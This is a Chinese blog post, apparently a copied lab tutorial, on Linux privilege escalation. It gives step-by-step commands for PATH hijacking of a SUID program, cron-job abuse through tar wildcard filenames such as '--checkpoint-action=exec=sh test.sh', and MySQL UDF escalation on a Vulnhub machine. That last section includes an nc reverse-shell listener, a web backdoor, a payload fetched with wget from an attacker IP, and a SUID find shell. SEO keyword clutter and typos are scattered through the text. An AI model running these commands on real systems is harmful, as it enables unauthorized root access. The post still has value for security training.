LinuxGod.net
Linux大神网——精选每一篇高品质的技术干货
  1. 首页
  2. 开源快讯
  3. 正文

Linux定时任务安全权限提升)

2023年1月16日 282点热度

权限提升-Linux定时任务&环境变量&数据库

linux执行权限和写权限_linux提升权限_termux提升root权限

termux提升root权限_linux执行权限和写权限_linux提升权限

权限提升

Linux权限

用户的权限用“id”命令来查看,权限分为uid、gid、groups,即属主、属组、其他

文件的权限又分为rwx,即读、写、执行,由三组二进制数据表示

Linux提权本地环境变量安全-Aliyun

提权条件:复制了SUID权限,还需要本地用户权限

提权原理:借环境变量的执行顺序永久免费linux服务器linux查看操作系统,替换了高权限的命令,获取权限

注意:虽然例子中的“shell”文件是我们自己写的,但这里是模拟的用户自己配置的有SUID权限的文件。我们替换了该文件中被调用的命令,获得了root权限的反弹窗口

替换命令的方法是借助环境变量会逐个文件夹找命令的运行逻辑,在被执行的命令之前就加一个同名的环境变量

提权过程:手写调用文件-编译-复制文件-增加环境变量-执行触发

手写文件demo.c,里面包含“ps”命令

#include

void main()

{

setuid(0);

setgid(0);

system(“ps”);

}

将demo.c编译成shell

gcc demo.c -o shell

将shell文件复制到目标机器中,给予SUID权限

增加环境变量,注意此时“tmp”文件夹还不是环境变量的文件夹

cp /bin/sh /tmp/ps

将“tmp”文件夹的内容划为环境变量

export PATH=/tmp:$PATH

执行“shell”触发,反弹一个窗口

./shell

查看权限,发现已经变成了root权限

id

Linux提权本地定时任务安全-Aliyun

第一种:路径问题(未实现)

提权原理:利用计划任务指向的文件的相对路径解析问题

计划任务使用相对路径来指定命令时,默认路径是“/usr/local/bin”。在当前用户的目录下创建相同名字的文件,会比默认路径优先级更高

提权过程:

查看当前的定时任务

cat /ect/crontab

在当前用户的目录下创建相同名字的文件,其中包含获取root权限的命令

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/xiaodi/test.sh

chmod +x /home/xiaodi/test.sh

/tmp/bash

第二种:命令问题(WS注入)

提权条件:有通配符的可以调用其他命令的命令被放入计划任务中

提权原理:利用通配符配合命令参数自定义命令实现提权

可以将通配符所匹配的内容写成命令的参数,调用其他命令

提权过程:

我们首先假设目标机器上有类似如下带有通配符的任务

不安全定时任务备份命令:

cd /home/undead/script;tar czf /tmp/backup.tar.gz *

新建“test.sh”,其中有获取root权限的命令

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/undead/script/test.sh

新建两个文件,文件名代替通配符时会和命令组合成新命令,执行“test.sh”

echo "" > "--checkpoint-action=exec=sh test.sh"

echo "" > --checkpoint=1

等到定时任务完成,调用已经获得root权限的bash

./bash -p

参考命令:其他命令是否可以请查看《Linux提权手法总结.pdf》

第三种:权限问题

提权原理:利用不安全的权限分配操作导致的定时文件覆盖

管理员没有正确的赋予权限,比如给了文件777的权限,导致定时任务可以被修改

Linux提权数据库MYSQL_UDF-Vulnhub

提权过程:Vulnhub某靶机-探针IP及端口-利用漏洞获取web权限-信息收集-查看数据库配置文件-利用Mysql提权Linux(Mysql版本区别同Windows)

探针IP及端口

nmap 192.168.76.0/24

利用phpmailer漏洞进行修改并反弹

python D:/Myproject/40974.py

nc -lvvp 4444

写入后门利用菜刀连接方便操作

echo '' >1.php

上传信息收集脚本进行提权信息收集

termux提升root权限_linux提升权限_linux执行权限和写权限

./LinEnum.sh

翻阅数据库配置文件获取root密码

利用Mysql提权searchsploit

下载mysql udf poc进行编译,建议在本地

wget

mv 1518 raptor_udf.c

gcc -g -c raptor_udf.c

编译成.so文件,即动态链接库

gcc -g -shared -o raptor_udf.so raptor_udf.o -lc

mv raptor_udf.so 1518.so

上传或下载1518到目标服务器,这里是目标服务器下载从攻击方下载

wget [攻击者IP]/1518.so

进入数据库进行UDF导出(导出dll文件并执行命令执行函数实现提权,跟Windows一样)

use mysql;

create table foo(line blob);

insert into foo values(load_file('/tmp/1518.so'));

select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';

创建do_system函数调用

linux提升权限_linux执行权限和写权限_termux提升root权限

create function do_system returns integer soname '1518.so';

select do_system('chmod u+s /usr/bin/find');

配合使用find调用执行

touch xiaodi

find xiaodi –exec "whoami" ;

find xiaodi –exec "/bin/sh" ;

id

Linux提权提升简单总结归类-参考PDF

1.提权环境(web环境、本地环境),信息收集(SUID、定时任务、可能漏洞、第三方服务应用等)

2.最新相关漏洞要明确(关注点),二次开发相关脚本学会展望(四个脚本)

3.最新漏洞:本地searchsploit脚本及远程exploitdb站点搜索说明(简要使用)

4.其他提权方法如:密码复用,guidlinux提升权限linux提升权限,sudo等说明(运气,同理,鸡肋等)

SUDO说明参考:

涉及资源:

exploit database:

RAVEN: 2(vulnhub的靶场):,269/

exploitdb(Linux工具):

Linux下的tar压缩解压缩命令详解:

CVE-2019-14287:sudo权限绕过漏洞分析与复现:

本作品采用 知识共享署名 4.0 国际许可协议 进行许可
标签: 变量 命令 定时 权限 漏洞
最后更新:2023年1月16日

Linux大神网

每日更新,欢迎收藏♥ 不积跬步无以至千里,加油,共勉。

点赞
< 上一篇
下一篇 >

Linux大神网

每日更新,欢迎收藏♥
不积跬步无以至千里,加油,共勉。

最新 热点 随机
最新 热点 随机
查看系统版本 linux “”的有关知识,不少人都会遇到这样的困境 Linux在内核中是如何记录进程资源的?你能从C语言源代码层面分析下吗? 【】原操作系统配备内核源代码,更不能进行内核模块实验 【Linux基础知识】与文件权限管理的Linux关系 linux/管理员管理员发布于5年前34(图) Linux和Unix操作系统之间有区别但也有联系?(一) Ubuntu系统如何升级和更新Linux内核版本?将推荐 Linux内核技术组成、组织和重要的数据结构等(组图) 【报错日志】一下升级linux内核的启动顺序为0 Linux终端窗口中输入mysql-V以显示MySQL版本信息sky 计算机操作系统全新版装系统盘点、理念与系统的优缺点 linux中常用的用户管理命令:1groups?列出当前用户所属 Linux下如何设置开机启动启动脚本?学算法 Linux中已经安装好了mysql命令 Linux系统用户系统上的三种类型的帐户的介绍 Linux下的开机启动设置方法是什么?脚本或服务 谷歌更新Linux内核构建的公共内核库:添加对kokoro作业的支持 linux下mysql中可以使用REVOKE语句来删除某个用户的权限 内核的角度来看,调用hotplug和通常的hotplug环境 Linux系统在开机的时候自动加载某些脚本或系统服务
Linux5.12的推送请求不断涌入新开放的合并窗口预计4月底看到它的稳定版本go语言被称作互联网时代的c语言,用来开发嵌入式linux的理由腾讯云服务器上也搭建一套环境,安装成功自动启动个人笔记本安装Ubuntu20.04LTS下载地址启动第一步--加载BIOS当你打开计算机电源(组图)虚拟机安装Ubuntu操作系统-Ubuntu空间20G镜像下载指令中各个make-C~/linuxM=`pwd编译Linux启动过程中的几个部分内核的引导(图)如何在Linux上安装虚拟机的结果大多都是怎么安装的一个免费软件时间跟进的小白鼠是什么鬼?专题计算机是如何启动的?、内核操作系统的启动流程学习Linux最简单、最实用的环境就是虚拟机环境(上)基于命令修改文件的权限命令-ld1.Linux磁盘分区和目录Linux发行版本之间的差别很少?国内性价比很高的Linux虚拟主机系统安装的流程是什么?Linux下修改文件权限的权限与所有权的实现就显得很有必要linux到底难不难学呢?推荐可以查看Linux命令大全Linux中修改文件权限的命令、创建者所在组、所有人Linux的内核放在了哪里?/boot的启动目录一览阿里云>社区>主题地图S>查看存储推荐
Ubuntu这款这款.10版本镜像文件下载地址获取地址! Windows中命令提示符批量修改文件名称没有直接的方法是什么? 【Linux基础知识】特定的字符串反向查找文件(图) Linux发行版的学习方法与学习中应该注意的一些事 Linux内核6.0正式版发布:引入了新的伪伪设备 问在线客服扫码选项配置选项选项 无窗口的Python可执行程序(图)命令(组图) Linux系统如何设置开机默认启动应用程序?教程分享结束 udpsocket编程1.UDP编程框架常用函数小插曲 一下Linux系统启动过程 审计Linux系统日志可以提供有关网络事件的重要信息(图) 【王者荣耀】Linux内核的构成与学习方法(一) 如何找到Linux内核的版本号?或全部答案来修复 Linux设备驱动程序的类型和文件操作的基本开发过程 U盘安装linux系统解决方法:确保Linux下采用dd命令 关于Linux系统版本命令的一些看法及解决办法的通知 Linux预置七种运行级别在/inittab目录下的内核文件 Linux内核启动注册中断内核中断源如何实现多个定时器 RedHatLinux发行版套件管理方式的作用及管理方法 再传到linux2.配置数据库的环境和路径3.登陆数据库修改
标签聚合
linux系统 命令模式 电脑 shell 文件目录 unix 软件 linux服务器 sudo 虚拟机
书籍
课程
技术群
技术干货大合集↓
  • 2023年2月 / 26篇
  • 2023年1月 / 161篇
  • 2022年12月 / 187篇
  • 2022年11月 / 76篇

COPYRIGHT © 2023 linuxgod.net ALL RIGHTS RESERVED.